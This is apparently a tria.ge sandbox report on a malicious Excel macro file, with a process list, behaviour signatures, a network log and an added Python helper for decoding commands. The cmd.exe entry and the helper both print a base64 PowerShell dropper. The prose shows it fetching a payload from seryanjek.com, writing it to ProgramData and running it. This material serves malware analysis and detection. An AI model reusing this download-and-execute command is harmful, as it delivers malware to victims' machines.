Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    140s
  • max time network
    128s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20231222-en locale:en-us os:windows10-2004-x64 system
  • submitted
    09/01/2024, 00:35 UTC

General

  • Target

    4cdf257d1c1771b1ecd147badf058d02.xlsm

  • Size

    42KB

  • MD5

    4cdf257d1c1771b1ecd147badf058d02

  • SHA1

    a62dc214003f943b9242e628c7b6a1891000984e

  • SHA256

    dbab36b0c92470f2cffe6d16e31e58d52668605a7179d47542c4bbd2c41c15a3

  • SHA512

    96b5c89b90fd6f8b83696a81da2ff966cf03174de788a3efc7a65c51b06533386ec023a36b748440c41ea85e6ca07edd117e5202034def5644aba7db0fa0263f

  • SSDEEP

    768:Wv65bfxH+zrZN0DGCfkyX3eks4pSGn0Qic3q8Wt4oLZN4q:a6LIGzfPeUv02Q4c5

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\4cdf257d1c1771b1ecd147badf058d02.xlsm"
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:4208
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ExecutionPolicy BypasS -ENC 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
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:744
  • C:\Windows\system32\cmd.exe
    cmd.exe /c "powershell -ExecutionPolicy BypasS -ENC JAByAGUAcQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAIgBoAHQAdABwAHMAOgAvAC8AcwBlAHIAeQBhAG4AagBlAGsALgBjAG8AbQAvAGEAcABpAC8AdgAzAC8AZABpAHMAYQBtAGIAaQBnAHUAYQB0AGUALwBuAG8AbgBlAHEAdQBpAHYAYQBsAGUAbgB0AC8AZABpAHQAcgBpAGcAbwBuAGEAbAAiACkALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQAKACQAbQBlAG0AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtAAoAJAByAGUAcQAuAEMAbwBwAHkAVABvACgAJABtAGUAbQApAAoAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABLAHkAbABlAHAAbwBuAG8ALgBlAHgAZQAiACAALQBWAGEAbAB1AGUAIAAkAG0AZQBtAC4AVABvAEEAcgByAGEAeQAoACkAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUACgAkAHIAZQBxAC4AQwBsAG8AcwBlACgAKQAKACQAbQBlAG0ALgBDAGwAbwBzAGUAKAApAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABLAHkAbABlAHAAbwBuAG8ALgBlAHgAZQAiAA=="
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:716
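The -ENC argument on the cmd.exe command line above is the base64 encoding of a UTF-16LE PowerShell script, which is what powershell.exe -EncodedCommand consumes. The following Python is an added analyst helper, not part of this Triage report or of the sample: it decodes the encoded command copied from the cmd.exe entry (PID 716), flags the -ExecutionPolicy Bypass plus -EncodedCommand combination, pulls the contacted URL and the dropped file path out of the decoded script, and checks the Office-to-shell parent/child pair that the "unexpected child process" signature fires on. The parent/child chain EXCEL.EXE 4208 to cmd.exe 716 to powershell.exe 744 is inferred from the process list, since the report does not print parent PIDs, and the lists of Office and shell image names are this example's own choice.

```python
import base64
import re

# The cmd.exe command line (PID 716) copied from the process list above. The value
# after -ENC is base64 of a UTF-16LE script; "BypasS" is the sample's own casing.
ENCODED = "JAByAGUAcQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAIgBoAHQAdABwAHMAOgAvAC8AcwBlAHIAeQBhAG4AagBlAGsALgBjAG8AbQAvAGEAcABpAC8AdgAzAC8AZABpAHMAYQBtAGIAaQBnAHUAYQB0AGUALwBuAG8AbgBlAHEAdQBpAHYAYQBsAGUAbgB0AC8AZABpAHQAcgBpAGcAbwBuAGEAbAAiACkALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQAKACQAbQBlAG0AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtAAoAJAByAGUAcQAuAEMAbwBwAHkAVABvACgAJABtAGUAbQApAAoAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABLAHkAbABlAHAAbwBuAG8ALgBlAHgAZQAiACAALQBWAGEAbAB1AGUAIAAkAG0AZQBtAC4AVABvAEEAcgByAGEAeQAoACkAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUACgAkAHIAZQBxAC4AQwBsAG8AcwBlACgAKQAKACQAbQBlAG0ALgBDAGwAbwBzAGUAKAApAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABLAHkAbABlAHAAbwBuAG8ALgBlAHgAZQAiAA=="
CMD_LINE = 'cmd.exe /c "powershell -ExecutionPolicy BypasS -ENC ' + ENCODED + '"'

# PowerShell accepts -EncodedCommand, -e, -ec or any longer unambiguous prefix of
# -EncodedCommand, so match all of them, longest alternative first.
_ENC_PREFIXES = sorted(["ec"] + ["encodedcommand"[:i] for i in range(1, 15)], key=len, reverse=True)
ENC_RE = re.compile(r"-(?:" + "|".join(_ENC_PREFIXES) + r")\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s\"'<>)]+")
WINPATH_RE = re.compile(r"[A-Za-z]:\\[^\s\"'<>]+")

# Office spawning a shell or script host is the macro-launch chain seen above.
# Both sets are this example's own choice (assumption), not Triage's lists.
OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def decode_encoded_command(b64: str) -> str:
    """Decode an -EncodedCommand value to the original script text."""
    # The bytes are UTF-16LE. Decoding them as UTF-8 is a common triage mistake:
    # you get "$", NUL, "r", NUL, "e", NUL ... and string matching silently fails.
    return base64.b64decode(b64, validate=True).decode("utf-16-le")


def triage_command_line(cmdline: str) -> dict:
    """Decode the script and pull out what an analyst wants first: the URLs it
    contacts, the paths it writes or launches, and whether it starts a dropped file."""
    result = {
        "execution_policy_bypass": re.search(r"-ex\w*\s+bypass\b", cmdline, re.I) is not None,
        "encoded": False,
        "script": None,
        "urls": [],
        "paths": [],
        "launches_dropped_file": False,
    }
    match = ENC_RE.search(cmdline)
    if match is None:
        return result
    script = decode_encoded_command(match.group(1))
    result.update(
        encoded=True,
        script=script,
        urls=URL_RE.findall(script),
        paths=sorted(set(WINPATH_RE.findall(script))),
        launches_dropped_file=re.search(r"\bStart-Process\b", script, re.I) is not None,
    )
    return result


def suspicious_parent_child(parent_image: str, child_image: str) -> bool:
    """True when an Office application spawns a shell or script host."""
    parent = parent_image.rsplit("\\", 1)[-1].lower()
    child = child_image.rsplit("\\", 1)[-1].lower()
    return parent in OFFICE_IMAGES and child in SHELL_IMAGES


if __name__ == "__main__":
    # Parent/child pairs as inferred from the process list (assumption: the report
    # does not print parent PIDs): EXCEL.EXE 4208 -> cmd.exe 716 -> powershell.exe 744
    chain = [
        (r"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE", r"C:\Windows\system32\cmd.exe"),
        (r"C:\Windows\system32\cmd.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ]
    for parent, child in chain:
        verdict = "OFFICE->SHELL" if suspicious_parent_child(parent, child) else "ok"
        print(parent.rsplit("\\", 1)[-1], "->", child.rsplit("\\", 1)[-1], ":", verdict)
    info = triage_command_line(CMD_LINE)
    print(info["script"])
    print("URLs:", info["urls"])
    print("Paths:", info["paths"])
```

Decoded, the script creates a System.Net.WebRequest to https://seryanjek.com/api/v3/disambiguate/nonequivalent/ditrigonal, copies the response body into a MemoryStream, writes the bytes to C:\ProgramData\Kylepono.exe with Set-Content -Encoding Byte, and launches that file with Start-Process. The Network section below records the seryanjek.com A query from powershell.exe with no address in the response and no connection to that host, and Kylepono.exe does not appear under Downloads, so the second stage was not retrieved in this run; the URL and the drop path are still the IOCs to hunt for.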

Network

  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dns.google
  • flag-us
    DNS
    82.177.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    82.177.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    82.177.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    82.177.190.20.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    240.76.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    240.76.109.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    2.136.104.51.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    2.136.104.51.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    9.228.82.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    9.228.82.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    180.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    180.178.17.96.in-addr.arpa
    IN PTR
    Response
    180.178.17.96.in-addr.arpa
    IN PTR
    a96-17-178-180.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    180.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    180.178.17.96.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    138.201.86.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    138.201.86.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    41.110.16.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    41.110.16.96.in-addr.arpa
    IN PTR
    Response
    41.110.16.96.in-addr.arpa
    IN PTR
    a96-16-110-41.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    seryanjek.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    seryanjek.com
    IN A
    Response
  • flag-us
    DNS
    10.179.89.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    10.179.89.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    59.128.231.4.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    59.128.231.4.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    158.240.127.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    158.240.127.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    183.59.114.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    183.59.114.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    56.126.166.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    56.126.166.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    56.126.166.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    56.126.166.20.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    134.71.91.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    134.71.91.104.in-addr.arpa
    IN PTR
    Response
    134.71.91.104.in-addr.arpa
    IN PTR
    a104-91-71-134.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    194.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    194.178.17.96.in-addr.arpa
    IN PTR
    Response
    194.178.17.96.in-addr.arpa
    IN PTR
    a96-17-178-194.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    31.243.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    31.243.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    55.36.223.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    55.36.223.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    55.36.223.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    55.36.223.20.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    tse1.mm.bing.net
    Remote address:
    8.8.8.8:53
    Request
    tse1.mm.bing.net
    IN A
    Response
    tse1.mm.bing.net
    IN CNAME
    mm-mm.bing.net.trafficmanager.net
    mm-mm.bing.net.trafficmanager.net
    IN CNAME
    dual-a-0001.a-msedge.net
    dual-a-0001.a-msedge.net
    IN A
    204.79.197.200
    dual-a-0001.a-msedge.net
    IN A
    13.107.21.200
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239317300984_1U4S330V4ADUBL082&pid=21.2&w=1920&h=1080&c=4
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239317300984_1U4S330V4ADUBL082&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 432696
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 05C6E3FF3D9046D5B946B92F871B4F64 Ref B: LON04EDGE0608 Ref C: 2024-01-09T00:37:26Z
    date: Tue, 09 Jan 2024 00:37:26 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239317301216_1YVZ0IIVCJV3CQIQF&pid=21.2&w=1920&h=1080&c=4
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239317301216_1YVZ0IIVCJV3CQIQF&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 389297
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 4D66B43590564EA790DB41B02A07576A Ref B: LON04EDGE0608 Ref C: 2024-01-09T00:37:26Z
    date: Tue, 09 Jan 2024 00:37:26 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239317301417_1HAO9MU1YYNEL08DS&pid=21.2&w=1080&h=1920&c=4
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239317301417_1HAO9MU1YYNEL08DS&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 278792
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: A5EF8917E5D449E68CD3BD06B950BBAB Ref B: LON04EDGE0608 Ref C: 2024-01-09T00:37:26Z
    date: Tue, 09 Jan 2024 00:37:26 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239317301625_1HP779E00BH478LC1&pid=21.2&w=1080&h=1920&c=4
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239317301625_1HP779E00BH478LC1&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 494968
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 89159058E52F4C6FB74EB1597230808E Ref B: LON04EDGE0608 Ref C: 2024-01-09T00:37:26Z
    date: Tue, 09 Jan 2024 00:37:26 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239317301219_14UAHY3NBMU2Z6DRW&pid=21.2&w=1920&h=1080&c=4
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239317301219_14UAHY3NBMU2Z6DRW&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 283222
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 262FAFBE6FBC471F9496A63447D50711 Ref B: LON04EDGE0608 Ref C: 2024-01-09T00:37:26Z
    date: Tue, 09 Jan 2024 00:37:26 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239317301628_1KUT45F8FQUS0QNCJ&pid=21.2&w=1080&h=1920&c=4
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239317301628_1KUT45F8FQUS0QNCJ&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 324072
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: CBFF091D13944764BF0B15CC53C20468 Ref B: LON04EDGE0608 Ref C: 2024-01-09T00:37:27Z
    date: Tue, 09 Jan 2024 00:37:26 GMT
  • flag-us
    DNS
    200.197.79.204.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    200.197.79.204.in-addr.arpa
    IN PTR
    Response
    200.197.79.204.in-addr.arpa
    IN PTR
    a-0001.a-msedge.net
  • flag-us
    DNS
    200.197.79.204.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    200.197.79.204.in-addr.arpa
    IN PTR
  • 204.79.197.200:443
    https://tse1.mm.bing.net/th?id=OADD2.10239317301628_1KUT45F8FQUS0QNCJ&pid=21.2&w=1080&h=1920&c=4
    tls, http2
    85.8kB
    2.3MB
    1682
    1678

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239317300984_1U4S330V4ADUBL082&pid=21.2&w=1920&h=1080&c=4

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239317301216_1YVZ0IIVCJV3CQIQF&pid=21.2&w=1920&h=1080&c=4

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239317301417_1HAO9MU1YYNEL08DS&pid=21.2&w=1080&h=1920&c=4

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239317301625_1HP779E00BH478LC1&pid=21.2&w=1080&h=1920&c=4

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239317301219_14UAHY3NBMU2Z6DRW&pid=21.2&w=1920&h=1080&c=4

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239317301628_1KUT45F8FQUS0QNCJ&pid=21.2&w=1080&h=1920&c=4

    HTTP Response

    200
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    8.3kB
    16
    14
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    8.3kB
    16
    14
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    8.3kB
    16
    14
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    8.3kB
    16
    14
  • 8.8.8.8:53
    8.8.8.8.in-addr.arpa
    dns
    66 B
    90 B
    1
    1

    DNS Request

    8.8.8.8.in-addr.arpa

  • 8.8.8.8:53
    82.177.190.20.in-addr.arpa
    dns
    144 B
    158 B
    2
    1

    DNS Request

    82.177.190.20.in-addr.arpa

    DNS Request

    82.177.190.20.in-addr.arpa

  • 8.8.8.8:53
    240.76.109.52.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    240.76.109.52.in-addr.arpa

  • 8.8.8.8:53
    2.136.104.51.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    2.136.104.51.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    9.228.82.20.in-addr.arpa
    dns
    70 B
    156 B
    1
    1

    DNS Request

    9.228.82.20.in-addr.arpa

  • 8.8.8.8:53
    180.178.17.96.in-addr.arpa
    dns
    144 B
    137 B
    2
    1

    DNS Request

    180.178.17.96.in-addr.arpa

    DNS Request

    180.178.17.96.in-addr.arpa

  • 8.8.8.8:53
    138.201.86.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    138.201.86.20.in-addr.arpa

  • 8.8.8.8:53
    41.110.16.96.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    41.110.16.96.in-addr.arpa

  • 8.8.8.8:53
    seryanjek.com
    dns
    powershell.exe
    59 B
    132 B
    1
    1

    DNS Request

    seryanjek.com

  • 8.8.8.8:53
    10.179.89.13.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    10.179.89.13.in-addr.arpa

  • 8.8.8.8:53
    59.128.231.4.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    59.128.231.4.in-addr.arpa

  • 8.8.8.8:53
    158.240.127.40.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    158.240.127.40.in-addr.arpa

  • 8.8.8.8:53
    183.59.114.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    183.59.114.20.in-addr.arpa

  • 8.8.8.8:53
    56.126.166.20.in-addr.arpa
    dns
    144 B
    158 B
    2
    1

    DNS Request

    56.126.166.20.in-addr.arpa

    DNS Request

    56.126.166.20.in-addr.arpa

  • 8.8.8.8:53
    134.71.91.104.in-addr.arpa
    dns
    72 B
    137 B
    1
    1

    DNS Request

    134.71.91.104.in-addr.arpa

  • 8.8.8.8:53
    194.178.17.96.in-addr.arpa
    dns
    72 B
    137 B
    1
    1

    DNS Request

    194.178.17.96.in-addr.arpa

  • 8.8.8.8:53
    31.243.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    31.243.111.52.in-addr.arpa

  • 8.8.8.8:53
    55.36.223.20.in-addr.arpa
    dns
    142 B
    157 B
    2
    1

    DNS Request

    55.36.223.20.in-addr.arpa

    DNS Request

    55.36.223.20.in-addr.arpa

  • 8.8.8.8:53
    tse1.mm.bing.net
    dns
    62 B
    173 B
    1
    1

    DNS Request

    tse1.mm.bing.net

    DNS Response

    204.79.197.200
    13.107.21.200

  • 8.8.8.8:53
    200.197.79.204.in-addr.arpa
    dns
    146 B
    106 B
    2
    1

    DNS Request

    200.197.79.204.in-addr.arpa

    DNS Request

    200.197.79.204.in-addr.arpa

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xa50bq5p.fxa.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/744-3780-0x00007FF80E530000-0x00007FF80EFF1000-memory.dmp

    Filesize

    10.8MB

